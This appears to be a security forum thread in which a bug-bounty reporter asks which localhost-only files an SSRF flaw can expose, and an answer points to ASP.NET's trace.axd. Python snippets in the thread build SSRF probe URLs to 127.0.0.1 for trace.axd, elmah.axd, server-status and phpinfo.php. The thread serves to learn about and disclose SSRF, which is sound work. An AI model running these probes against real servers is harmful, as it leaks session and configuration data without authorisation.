If I was able to view any page on a website as localhost using SSRF, what files should I check for? I checked to see if I could view robots.txt normally, and I couldn't, but using SSRF, I was able to. What other files are typical on websites that are normally hidden to the public, but would be visible on the localhost?
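The comparison described above can be sketched as two URL builders: one for an ordinary public request, and one that asks the server to fetch the same path from itself, so local-only access rules apply. A minimal sketch; the target host and the "?url=" fetch parameter are hypothetical stand-ins for the vulnerable endpoint, not anything from the original report.

```python
# Sketch of the two requests being compared: a direct external fetch
# vs. the same path fetched server-side through a hypothetical
# SSRF-vulnerable endpoint. "target.example" and "/fetch?url=" are
# assumptions for illustration only.
from urllib.parse import quote

TARGET = "https://target.example"
SSRF_ENDPOINT = TARGET + "/fetch?url="  # hypothetical vulnerable parameter

def direct_url(path: str) -> str:
    """URL for an ordinary request from the outside."""
    return TARGET + path

def ssrf_url(path: str) -> str:
    """Same path, but requested by the server from itself (127.0.0.1),
    so any local-only restriction no longer blocks it."""
    return SSRF_ENDPOINT + quote("http://127.0.0.1" + path, safe="")

print(direct_url("/robots.txt"))
print(ssrf_url("/robots.txt"))
```

If the direct URL returns a 403/404 while the SSRF-built URL returns content, the resource is restricted to local requests, which is the behaviour the asker observed with robots.txt.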
- I think robots.txt should be publicly accessible regardless; otherwise how would search engine spiders read it? – thexacre Jun 02 '14 at 00:42
- @thexacre That's what I thought, but apparently that isn't always the case. I've found this on two websites, one being Facebook-Studio. I reported it to Facebook and they fixed the issue. – Michael Blake Jun 02 '14 at 00:43
- I can access the robots.txt on that site publicly, but perhaps they fixed it because of other implications — which is, I suppose, why you asked this question :P – thexacre Jun 02 '14 at 01:36
1 Answer
1
In a Microsoft environment, your best bet is probably the trace.axd handler. ASP.NET tracing is often left enabled and, by default, is restricted to local requests only (localOnly="true" in web.config), so it is hidden from the public but readable when the request comes from localhost — exactly what your SSRF gives you.
http://msdn.microsoft.com/en-us/library/vstudio/bb386420(v=vs.100).aspx
The trace output can include a lot of sensitive material: request and session details, developer debug output, and environment configuration data.
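Beyond trace.axd, a short candidate list of paths that are commonly restricted to local requests can be probed the same way. A sketch, not an exhaustive or authoritative list: trace.axd comes from the answer above, while the remaining paths are common local-only candidates added here as assumptions, and the "?url=" endpoint is hypothetical.

```python
# Sketch: build one SSRF probe URL per candidate local-only path.
# Only trace.axd is from the original answer; the other paths and the
# "?url=" fetch parameter are illustrative assumptions.
from urllib.parse import quote

CANDIDATE_PATHS = [
    "/trace.axd",      # ASP.NET trace viewer (often localOnly)
    "/elmah.axd",      # ELMAH error log viewer (ASP.NET)
    "/server-status",  # Apache mod_status, usually local-only
    "/server-info",    # Apache mod_info, usually local-only
    "/phpinfo.php",    # sometimes left behind by developers
]

def probe_urls(ssrf_endpoint: str) -> list[str]:
    """Return one SSRF request URL per candidate path, each asking the
    server to fetch the path from itself over the loopback address."""
    return [ssrf_endpoint + quote("http://127.0.0.1" + p, safe="")
            for p in CANDIDATE_PATHS]

for u in probe_urls("https://target.example/fetch?url="):
    print(u)
```

Any path that 404s directly but returns content through the probe is worth a closer look.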
jamiescott
- Thank you for that. Unfortunately I got a 404 for that file, but I found that a cgi-sys folder exists, so I'm assuming they're using cPanel. – Michael Blake Jun 03 '14 at 01:25